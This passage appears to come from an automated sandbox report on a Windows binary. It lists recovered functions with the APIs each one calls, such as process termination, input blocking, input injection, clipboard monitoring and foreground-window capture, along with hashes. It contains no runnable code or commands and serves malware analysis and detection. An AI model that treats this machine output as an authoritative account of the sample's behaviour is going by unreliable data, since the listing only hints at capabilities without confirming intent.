OpenSCManagerW.ADVAPI32 ref: 000000014005E2C5
LockServiceDatabase.ADVAPI32 ref: 000000014005E2D6
UnlockServiceDatabase.ADVAPI32 ref: 000000014005E2E4
GetLastError.KERNEL32 ref: 000000014005E2EC
CloseServiceHandle.ADVAPI32 ref: 000000014005E301

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: Service$Database$CloseErrorHandleLastLockManagerOpenUnlock
String ID:
API String ID: 2828566434-0
Opcode ID: bcd2d6bf93fd5efbc0dc177e629ef24e2e6ab0ed49ea474553fd752b7d2ab35c
Instruction ID: 810d6b9632852b0fb14260f894c1d77f3242f0f06b51f61f73978932a4f0a777
Opcode Fuzzy Hash: bcd2d6bf93fd5efbc0dc177e629ef24e2e6ab0ed49ea474553fd752b7d2ab35c
Instruction Fuzzy Hash: 6F014F3162579082EB5ECB63A41939963A4AB4CBD0F185025FB4A47BB8EF38C486C704

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140062580, Relevance: 7.5, APIs: 5, Instructions: 33windowtimethreadCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32 ref: 00000001400625AD
GetWindowThreadProcessId.USER32 ref: 00000001400625BD
OpenProcess.KERNEL32 ref: 00000001400625D1
TerminateProcess.KERNEL32 ref: 00000001400625E4
CloseHandle.KERNEL32 ref: 00000001400625ED

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: Process$CloseHandleMessageOpenSendTerminateThreadTimeoutWindow
String ID:
API String ID: 1181120299-0
Opcode ID: 10269afc2fcc4e45ad43c827a92e9137ea20018077fb9de502c78cc21ac041f0
Instruction ID: 1dd0b0385fa1981ea7fda8e881f6eaa9ccbc1787e1f99d176bbe1e32f74be820
Opcode Fuzzy Hash: 10269afc2fcc4e45ad43c827a92e9137ea20018077fb9de502c78cc21ac041f0
Instruction Fuzzy Hash: 57F04432715F8143FF6ADB27AD147966691BB8D7C1F085434AA0F43B74EF38C0458A01

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400B456C, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 205COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00000001400B4810

Strings

UTF-16LEUNICODE, xrefs: 00000001400B47B7
UTF-8, xrefs: 00000001400B4794
ccs, xrefs: 00000001400B4755

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: _invalid_parameter_noinfo
String ID: UTF-16LEUNICODE$UTF-8$ccs
API String ID: 3215553584-1196891531
Opcode ID: 8915ed985d46f897efdb59f48f5ac757c1f977d4abf12b727ee25b2f076bf1ba
Instruction ID: ce09eea12ee9771816f5663a3050589847fb1d184ab08d36b47d62e23fe534d7
Opcode Fuzzy Hash: 8915ed985d46f897efdb59f48f5ac757c1f977d4abf12b727ee25b2f076bf1ba
Instruction Fuzzy Hash: 8181AEB6A88A4086FB778FA796443E927B0E71E7C4F158015EB02576E1EB34CA50D702

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400770C0, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 199COMMON

Download Yara Rule

Strings

0, xrefs: 000000014007712D

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 8414905be89eae9157c4e16e20ab82a82e024b28db86c15792e68a2dfb60a952
Instruction ID: 0772dd126e63fe8e8e657f626fff741befafa2e8fa83a7a5f7f86201136587dd
Opcode Fuzzy Hash: 8414905be89eae9157c4e16e20ab82a82e024b28db86c15792e68a2dfb60a952
Instruction Fuzzy Hash: 8271AC7221065082EB769B1B9455FED62A1F78DBC0F854112FF9D476E5EB3CC8828700

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400762B0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32 ref: 000000014007634E
IsDlgButtonChecked.USER32 ref: 00000001400763D9
ShowWindow.USER32 ref: 0000000140076469

Strings

Submit, xrefs: 000000014007630D

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: Window$ButtonCheckedLongShow
String ID: Submit
API String ID: 3251599074-949859957
Opcode ID: fabe9c2529be02be3a02164f8e33148237e8a0c279e6c2c6fbe15e36e413533c
Instruction ID: dc242e14d9ea7b89ed51297833e92c3817c90b5ab9d0151827543bf80303cd31
Opcode Fuzzy Hash: fabe9c2529be02be3a02164f8e33148237e8a0c279e6c2c6fbe15e36e413533c
Instruction Fuzzy Hash: 15519476200A8082EB62AF2BE54039DB7A1F7D9FD4F555202EF9A537A4CF39C945C740

Uniqueness

Uniqueness Score: -1.00%

Function 000000014004213C, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00000001400421C5
GetProcAddress.KERNEL32 ref: 00000001400421D5

Strings

user32, xrefs: 00000001400421BE
GetMonitorInfoW, xrefs: 00000001400421CE

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: AddressHandleModuleProc
String ID: GetMonitorInfoW$user32
API String ID: 1646373207-1338042020
Opcode ID: f511e3e105a2fc9fe97c4d6da7720ec614d6fca74bccd97aff6484242ea6c079
Instruction ID: 93d8f5e369c3b7e85fef2bad63b41b0ced46a2e94abde6fcbeea3d83c8fc72fb
Opcode Fuzzy Hash: f511e3e105a2fc9fe97c4d6da7720ec614d6fca74bccd97aff6484242ea6c079
Instruction Fuzzy Hash: 36218071704640C2EB52CB2AEA903A933A0E75CB94F994125EB99477B5EF38C9D1C714

Uniqueness

Uniqueness Score: -1.00%

Function 000000014005F3A6, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 73windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32 ref: 000000014005F3C8
SendMessageTimeoutW.USER32 ref: 000000014005F42C

Strings

Combo, xrefs: 000000014005F3D2
List, xrefs: 000000014005F3ED

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: ClassMessageNameSendTimeout
String ID: Combo$List
API String ID: 1632441287-1246219895
Opcode ID: 975b67d1cc2cf5d4dbeab7e05c40dd802a5b320a38dfa4e18d5727103b5209b5
Instruction ID: 2d5bd4b8fc0a97fc67ed647ddb94dc16cd8578d763a5a9c3f9736ce51444d93b
Opcode Fuzzy Hash: 975b67d1cc2cf5d4dbeab7e05c40dd802a5b320a38dfa4e18d5727103b5209b5
Instruction Fuzzy Hash: 89319432204B4486FB26CB22A4403ED27A1BB8D7F4F541316EB2903AF5CB7DC646D700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140013010, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 0000000140013056
GetForegroundWindow.USER32 ref: 000000014001309B
GetWindowTextW.USER32 ref: 00000001400130D7

Strings

N/A, xrefs: 0000000140013109

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: Window$CountForegroundTextTick
String ID: N/A
API String ID: 3416458291-2525114547
Opcode ID: a6e5be6aa8ad19ace3c0f63cbd10eb13e9c16deed5b00477d85dbe3e896431e8
Instruction ID: 6b9ec1d44580a326509f5d32523bbc3d1935014de24f701a4b48f28a309a47f8
Opcode Fuzzy Hash: a6e5be6aa8ad19ace3c0f63cbd10eb13e9c16deed5b00477d85dbe3e896431e8
Instruction Fuzzy Hash: 0B316972214684C2EB16DB63E8A07E8B760FF5EB80F45912AFB49577B4DB78C055EB00

Uniqueness

Uniqueness Score: -1.00%

Function 000000014005F2E1, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32 ref: 000000014005F2F2
SendMessageTimeoutW.USER32 ref: 000000014005F352

Strings

Combo, xrefs: 000000014005F2FC
List, xrefs: 000000014005F317

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: ClassMessageNameSendTimeout
String ID: Combo$List
API String ID: 1632441287-1246219895
Opcode ID: 6063d62766b85774f2a0b8ade889090ac7adaa829db27e74d432654c5e09a204
Instruction ID: e6abcf1758686aff88d5f5b96f91cf28832d97396dba2b8425e77809533ee7a4
Opcode Fuzzy Hash: 6063d62766b85774f2a0b8ade889090ac7adaa829db27e74d432654c5e09a204
Instruction Fuzzy Hash: 27317432214A8486FB66CB22E4407ED2762AB8D7F8F541316EB2903BF5CB7DC646D700

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400623A0, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 66COMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32 ref: 00000001400623C4
GetFullPathNameW.KERNEL32 ref: 0000000140062409

Strings

\, xrefs: 00000001400623E7
\, xrefs: 0000000140062425

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: FullNamePath
String ID: \$\
API String ID: 608056474-164819647
Opcode ID: ee806573cbceeccad63ffcd6bd4757052147a6dd204b5ca47ba79b3390db096b
Instruction ID: b449378c4673b10035b703cdbbd97067bfc236ab606d532076fa724863a5f5ac
Opcode Fuzzy Hash: ee806573cbceeccad63ffcd6bd4757052147a6dd204b5ca47ba79b3390db096b
Instruction Fuzzy Hash: 03317A32208BC591DA71CB11E4407DAB371F788798F944612EB9D43AA8DF3CC68ACB90

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400353A0, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 33libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00000001400A2B14: RtlAcquirePebLock.NTDLL ref: 00000001400A2B24

GetModuleHandleW.KERNEL32 ref: 00000001400353E1
GetProcAddress.KERNEL32 ref: 00000001400353F1

Part of subcall function 00000001400A2AB4: RtlAcquirePebLock.NTDLL ref: 00000001400A2AC4
Part of subcall function 00000001400A2AB4: RtlLeaveCriticalSection.NTDLL ref: 00000001400A2B04

Strings

user32, xrefs: 00000001400353DA
BlockInput, xrefs: 00000001400353EA

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: AcquireLock$AddressCriticalHandleLeaveModuleProcSection
String ID: BlockInput$user32
API String ID: 242699652-2744593370
Opcode ID: 4fdb8daa877cb16a893c4067476ac26ed4a4c2599a2f864d287b86fb6aecfdd6
Instruction ID: 1816a46fbccca5c273b47c250705cbe078f9c6ae686fb166674fb12802326e7d
Opcode Fuzzy Hash: 4fdb8daa877cb16a893c4067476ac26ed4a4c2599a2f864d287b86fb6aecfdd6
Instruction Fuzzy Hash: C6012CB5301A50C2EA16FB2BE8A03D53360A76CB92F440125AB5D877F1EF38C88AD711

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400012C0, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 9libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00000001400012CB
GetProcAddress.KERNEL32 ref: 00000001400012DB

Strings

user32, xrefs: 00000001400012C4
SendInput, xrefs: 00000001400012D4

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: AddressHandleModuleProc
String ID: SendInput$user32
API String ID: 1646373207-2278465184
Opcode ID: 1fed0c9193589a4ceaf0bead44abff6c4cc8cfba1c106c490be916a7b9eb20ec
Instruction ID: a307116f2aeb73140a9c59e96505630dc3b507579477d8c410e9f8761428541c
Opcode Fuzzy Hash: 1fed0c9193589a4ceaf0bead44abff6c4cc8cfba1c106c490be916a7b9eb20ec
Instruction Fuzzy Hash: 0DD0C938612E40C1EA0ABB03EC643DA2260BB4C790FC00422D64E03730EF3C819BC310

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400012F0, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 9libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00000001400012FB
GetProcAddress.KERNEL32 ref: 000000014000130B

Strings

user32, xrefs: 00000001400012F4
RemoveClipboardFormatListener, xrefs: 0000000140001304

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: AddressHandleModuleProc
String ID: RemoveClipboardFormatListener$user32
API String ID: 1646373207-262861245
Opcode ID: 8c4e34b235507069c337900ae72491b33a58aead9bfbbd5ad25567392348ba19
Instruction ID: ce72f567ee8c3033e459a9cd2b53766cacf05e4fc62a8a6439c235c6d56fa659
Opcode Fuzzy Hash: 8c4e34b235507069c337900ae72491b33a58aead9bfbbd5ad25567392348ba19
Instruction Fuzzy Hash: 3ED0C934612E40D1E60ABB13ECA43D622A0B74C790F800411E64E03731EF3C859AC300

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140001320, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 9libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 000000014000132B
GetProcAddress.KERNEL32 ref: 000000014000133B

Strings

user32, xrefs: 0000000140001324
AddClipboardFormatListener, xrefs: 0000000140001334

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: AddressHandleModuleProc
String ID: AddClipboardFormatListener$user32
API String ID: 1646373207-221531295
Opcode ID: 1d540dd559172a5b90575b43287fcda6b349ec9434e69bb76cb3f3249fe6bf78
Instruction ID: fcef42757a0849afe3c61ded7f87806618e175f949365c13eae2a4eacccee3db
Opcode Fuzzy Hash: 1d540dd559172a5b90575b43287fcda6b349ec9434e69bb76cb3f3249fe6bf78
Instruction Fuzzy Hash: DBD0C934611F40C1E60ABB13EC643D62270B74C790FC00411E64E03731EF3C859B8700

Uniqueness

Uniqueness Score: -1.00%

Function 000000014000B510, Relevance: 6.3, APIs: 4, Instructions: 343registrytimeCOMMON

Download Yara Rule

APIs

UnregisterHotKey.USER32 ref: 000000014000B5EE
RegisterHotKey.USER32 ref: 000000014000B8F7
UnregisterHotKey.USER32 ref: 000000014000B926
SetTimer.USER32 ref: 000000014000BA25

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: Unregister$RegisterTimer
String ID:
API String ID: 1006365865-0
Opcode ID: e79b2e4c653b0279ed9586e45cf1ea671b5223d02d9ea161a21a28ae773a4446
Instruction ID: 490d8edbca9477493e95159896f77fbb304d8ee30b181de2277da5e7cf724023
Opcode Fuzzy Hash: e79b2e4c653b0279ed9586e45cf1ea671b5223d02d9ea161a21a28ae773a4446
Instruction Fuzzy Hash: 3DF18CF2608A8485FB77CB27A5443E93BE4E35ABC8F08404AEB84076F1DB79C5A5D741

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400B96B4, Relevance: 6.2, APIs: 4, Instructions: 160COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00000001400B96F5
_invalid_parameter_noinfo.LIBCMT ref: 00000001400B9772
_invalid_parameter_noinfo.LIBCMT ref: 00000001400B97C3
_get_daylight.LIBCMT ref: 00000001400B981F

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: _invalid_parameter_noinfo$_get_daylight
String ID:
API String ID: 72036449-0
Opcode ID: 1a8af62ed994a10ec80c821e5f9cdea4acab5972e665962b8409d89d375f43ad
Instruction ID: bc01d13e942b3fa2927267a7159d57160f2266be113c8550e71c4013136f553f
Opcode Fuzzy Hash: 1a8af62ed994a10ec80c821e5f9cdea4acab5972e665962b8409d89d375f43ad
Instruction Fuzzy Hash: 4451B136558E4086F7775EABD4453EA7AF0E34A7D4F198429BB058B2F7CA3CC840C682

Uniqueness

Uniqueness Score: -1.00%

Function 000000014008B680, Relevance: 6.1, APIs: 4, Instructions: 111windowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 000000014008B6E2
IsWindowVisible.USER32 ref: 000000014008B6FC
GetForegroundWindow.USER32 ref: 000000014008B728
IsWindowVisible.USER32 ref: 000000014008B77A

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: Window$ForegroundVisible
String ID:
API String ID: 4078700383-0
Opcode ID: f47fe86f7b6576e3e5753954d4608bd3b4ad57a35ca61933a838e1685bbb9713
Instruction ID: 0ef08e73eb9029e34f07e8673293715da90fad3eb8bda0e84d18f2e24024eff4
Opcode Fuzzy Hash: f47fe86f7b6576e3e5753954d4608bd3b4ad57a35ca61933a838e1685bbb9713
Instruction Fuzzy Hash: 04417233A1878585FB769B12A4403EA76E4F79C7D0F484126FB8943BA5EF78C691C740

Uniqueness

Uniqueness Score: -1.00%

Function 000000014007D5C0, Relevance: 6.1, APIs: 4, Instructions: 89windowCOMMON

Download Yara Rule

APIs

IsMenu.USER32 ref: 000000014007D5EE
GetMenu.USER32 ref: 000000014007D61F
DestroyMenu.USER32 ref: 000000014007D63F

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: Menu$Destroy
String ID:
API String ID: 3525833831-0
Opcode ID: 5c4d4fe03b1a64b22552a404e94a1d53109b584db142505ca916920d0297fc4f
